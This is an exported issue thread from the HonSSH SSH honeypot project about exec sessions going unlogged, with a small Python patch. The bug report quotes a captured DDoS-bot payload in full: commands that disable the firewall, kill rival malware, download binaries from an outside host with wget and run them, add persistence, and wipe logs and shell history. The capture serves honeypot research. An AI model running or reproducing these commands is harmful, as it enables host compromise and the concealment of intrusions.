Exec-Sessions do not get logged

GoogleCodeExporter commented 9 years ago

Another discovery:

exec-Sessions (message 98 with data = exec) do not get logged. Only 
pty-sessions (message 98 with data = pty-req).

Also, message 98 with data = exec should directly logged to the tty-log as a 
user input.

Here is a message-example of a DDOS-Bot which attacked my honeypot:

2014-03-01 10:35:01+0100 [HonsshServerTransport,3,116.27.9.0] SERVER: 
MessageNum: 98 Encrypted 
'\x00\x00\x00\x00\x00\x00\x00\x04exec\x01\x00\x00\x10\x88/etc/init.d/iptables 
stop\necho "nameserver 8.8.8.8" >> /etc/resolv.conf\necho "nameserver 8.8.4.4" 
>> /etc/resolv.conf\nyum -y install wget\nchmod 7777 / etc\nkillall -9 
.IptabLes\nkillall -9 nfsd4\nkillall -9 profild.key\ncd /etc;rm -rf dir 
fake.cfg\nkillall -9 nfsd\nkillall -9 DDosl\nkillall -9 lengchao32\nkillall -9 
b26\nkillall -9 Bill\nkillall -9 n26\nkillall -9 1\nkillall -9 
codelove\nkillall -9 32\nkillall -9 m32\nkillall -9 m64\nkillall -9 64\nkillall 
-9 83BOT \nkillall -9 82BOT\nkillall -9 dos64\nkillall -9 dos32\nkillall -9 
new6\nkillall -9 new4\nkillall -9 node24\nkillall -9 mimi\nkillall -9 
nodeJR-1\nkillall -9 freeBSD\nkillall -9 ksapdd\nkillall -9 kysapdd\nkillall -9 
sksapdd\nkillall -9 xsw \nkillall -9 syslogd\nkillall -9 skysapdd\nkillall -9 
cupsddd\nkillall -9 ksapd\nkillall -9 atddd\nkillall -9 xfsdxd\ncd /etc;chattr 
-i cupsdd\ncd /root; chmod 7777 / etc\nkillall -9 minerd\nkillall -9 0\nkillall 
-9 joudckfr\nkillall -9 www\nkillall -9 log\nkillall -9 .IptabLex\nkillall -9 
.Mm2\nkillall -9 acpid\nkillall -9 m64 \nkillall -9 ./QQ\nkillall -9 
QQ\nkillall -9 g3\nkillall -9 2\nkillall -9 3\nkillall -9 pm\nkillall -9 
qweasd\nkillall -9 tangtang\nkillall -9 imap-login\nkillall -9 cupsdd\nkillall 
-9 xudp\nkillall -9 txma\nkillall -9 mrdos64.b00\nkillall -9 
mrdos32.b00\nkillall -9 kkpklp\nkillall -9 kiilp\nkillall -9 xin1\nkillall -9 
jibateng\ncd /root;rm -rf dir nohup.out\ncd /etc;rm -rf dir cupsddd\ncd /etc;rm 
-rf dir atddd\ncd /etc;rm -rf dir ksapdd\ncd /etc;rm -rf dir kysapdd\ncd 
/etc;rm -rf dir sksapdd\ncd /etc;rm -rf dir skysapdd\ncd /etc;rm -rf dir 
xfsdxd\ncd /etc;rm -rf dir fake.cfg\ncd /etc;rm -rf dir cupsddd.*\ncd /etc;rm 
-rf dir atddd.*\ncd /etc;rm -rf dir ksapdd.*\ncd /etc;rm -rf dir kysapdd.*\ncd 
/etc;rm -rf dir sksapdd.*\ncd /etc;rm -rf dir skysapdd.*\ncd /etc;rm -rf dir 
xfsdxd.*\ncd /etc;rm -rf dir cupsdd\ncd /etc;rm -rf dir atdd\ncd /etc;rm -rf 
dir ksapd\ncd /etc;rm -rf dir kysapd\ncd /etc;rm -rf dir sksapd\ncd /etc;rm -rf 
dir skysapd\ncd /etc;rm -rf dir xfsdx\ncd /etc;rm -rf dir fake.cfg\ncd /etc;rm 
-rf dir cupsdd.*\ncd /etc;rm -rf dir atdd.*\ncd /etc;rm -rf dir ksapd.*\ncd 
/etc;rm -rf dir kysapd.*\ncd /etc;rm -rf dir sksapd.*\ncd /etc;rm -rf dir 
skysapd.*\ncd /etc;rm -rf dir xfsdx.*\ncd /var/spool/cron; rm -rf dir 
root.*\ncd /var/spool/cron; rm -rf dir root\ncd /var/spool/cron/crontabs; rm 
-rf dir root.*\ncd /var/spool/cron/crontabs; rm -rf dir root\ncd 
/var/spool/cron ;wget http://122.224.34.75:8182/root\ncd 
/var/spool/cron/crontabs ;wget http://122.224.34.75:8182/root\ncd /etc;wget 
http://122.224.34.75:8182/cupsdd\ncd /etc;wget 
http://122.224.34.75:8182/ksapdd\ncd /etc;wget 
http://122.224.34.75:8182/kysapdd\ncd /etc;wget 
http://122.224.34.75:8182/atddd\ncd /etc;wget 
http://122.224.34.75:8182/skysapdd\ncd /etc;wget 
http://122.224.34.75:8182/sksapdd\ncd /etc;wget 
http://122.224.34.75:8182/xfsdxd\ncd /etc;chmod 7777 xfsdxd\ncd /etc;chmod 7777 
atddd\ncd /etc;chmod 7777 cupsdd\ncd /etc;chmod 7777 ksapdd\ncd /etc;chmod 7777 
kysapdd\ncd /etc;chmod 7777 skysapdd\ncd /etc;chmod 7777 sksapdd\nnohup 
/etc/xfsdxd > /dev/null 2>&1&\nnohup /etc/cupsdd > /dev/null 2>&1&\nnohup 
/etc/ksapdd > /dev/null 2>&1&\nnohup /etc/kysapdd > /dev/null 2>&1&\nnohup 
/etc/atddd > /dev/null 2>&1&\nnohup /etc/skysapdd > /dev/null 2>&1&\nnohup 
/etc/sksapdd > /dev/null 2>&1&\necho "cd /etc;./ksapdd" >> /etc/rc.local \necho 
"cd /etc;./kysapdd" >> /etc/rc.local \necho "cd /etc;./atddd" >> /etc/rc.local 
\necho "cd /etc;./ksapdd" >> /etc/rc.local \necho "cd /etc;./skysapdd" >> 
/etc/rc.local \necho "cd /etc;./xfsdxd" >> /etc/rc.local \necho "unset 
MAILCHECK" >> /etc/profile\ncd /etc;chattr +i cupsdd\nrm -rf 
/root/.bash_history\ntouch /root/.bash_history\nhistory -r\ncd /var/log > dmesg 
\ncd /var/log > auth.log \ncd /var/log > alternatives.log \ncd /var/log > 
boot.log \ncd /var/log > btmp \ncd /var/log > cron \ncd /var/log > cups \ncd 
/var/log > daemon.log \ncd /var/log > dpkg.log \ncd /var/log > faillog \ncd 
/var/log > kern.log \ncd /var/log > lastlog\ncd /var/log > maillog \ncd 
/var/log > user.log \ncd /var/log > Xorg.x.log \ncd /var/log > anaconda.log 
\ncd /var/log > yum.log \ncd /var/log > secure\ncd /var/log > wtmp\ncd /var/log 
> utmp \ncd /var/log > messages\ncd /var/log > spooler\ncd /var/log > 
sudolog\ncd /var/log > aculog\ncd /var/log > access-log\ncd /root > 
.bash_history\nhistory -c\necho 
\xcc\xe1\xca\xbe----\xc3\xfc\xc1\xee\xd6\xb4\xd0\xd0\xb3\xc9\xb9\xa6\nsleep 600'

Original issue reported on code.google.com by flofriha...@gmail.com on 1 Mar 2014 at 1:10

GoogleCodeExporter commented 9 years ago

Another nice find :D

Thanks,

Original comment by tnn...@googlemail.com on 1 Mar 2014 at 1:20

Changed state: Started

GoogleCodeExporter commented 9 years ago

Here is my dirty implementation for that in server.py:

...
            elif messageNum == 98:
                num = int(payload[7:8].encode('hex'), 16)
                data = payload[8:8+num]
                if data == 'pty-req':
                    self.isPty = True
                    ttylog.ttylog_open(self.ttylog_file, time.time())
                elif data == 'exec':
                    self.isPty = True
                    ttylog.ttylog_open(self.ttylog_file, time.time())
                    data = ">>> " + payload[17:] + "\n"
                    ttylog.ttylog_write(self.ttylog_file, len(data), ttylog.TYPE_OUTPUT, time.time(), data)
            elif messageNum == 94:
...

Original comment by flofriha...@gmail.com on 1 Mar 2014 at 1:28

GoogleCodeExporter commented 9 years ago

Thanks for your fix. I've implemented it and also added better support for 
catching unknown SSH sessions :)

Hopefully when someone else connects you can let me know how it goes?

Cheers,
Peg

Original comment by tnn...@googlemail.com on 1 Mar 2014 at 2:23

Changed state: Fixed

GoogleCodeExporter commented 9 years ago

I have updated my 24/7 honeypot to the latest version. Will let you know, when 
I have the first results ^^

Original comment by flofriha...@gmail.com on 1 Mar 2014 at 2:32

GoogleCodeExporter commented 9 years ago

This looks much better! Only a little hard to distinguish between input and 
output, cause the input has multiple lines, but that is only a design problem ^^

Will also open some more tickets, because of unknown ssh-packets later.

Original comment by flofriha...@gmail.com on 1 Mar 2014 at 4:47

Attachments:

20140301_163623.tty

GoogleCodeExporter commented 9 years ago

Haha yeah, I've just got round to properly testing it myself and noticed all 
the unknown ssh-packets, my bad. 

I'll have a think about the input and output issue.

Original comment by tnn...@googlemail.com on 1 Mar 2014 at 5:02

GoogleCodeExporter commented 9 years ago

Fixed the unknown packets and logged the EXEC commands to the text log as well.

Original comment by tnn...@googlemail.com on 1 Mar 2014 at 5:53

GoogleCodeExporter commented 9 years ago

Issue 14 has been merged into this issue.

Original comment by tnn...@googlemail.com on 3 Mar 2014 at 3:52

tnich / honssh

Exec-Sessions do not get logged #9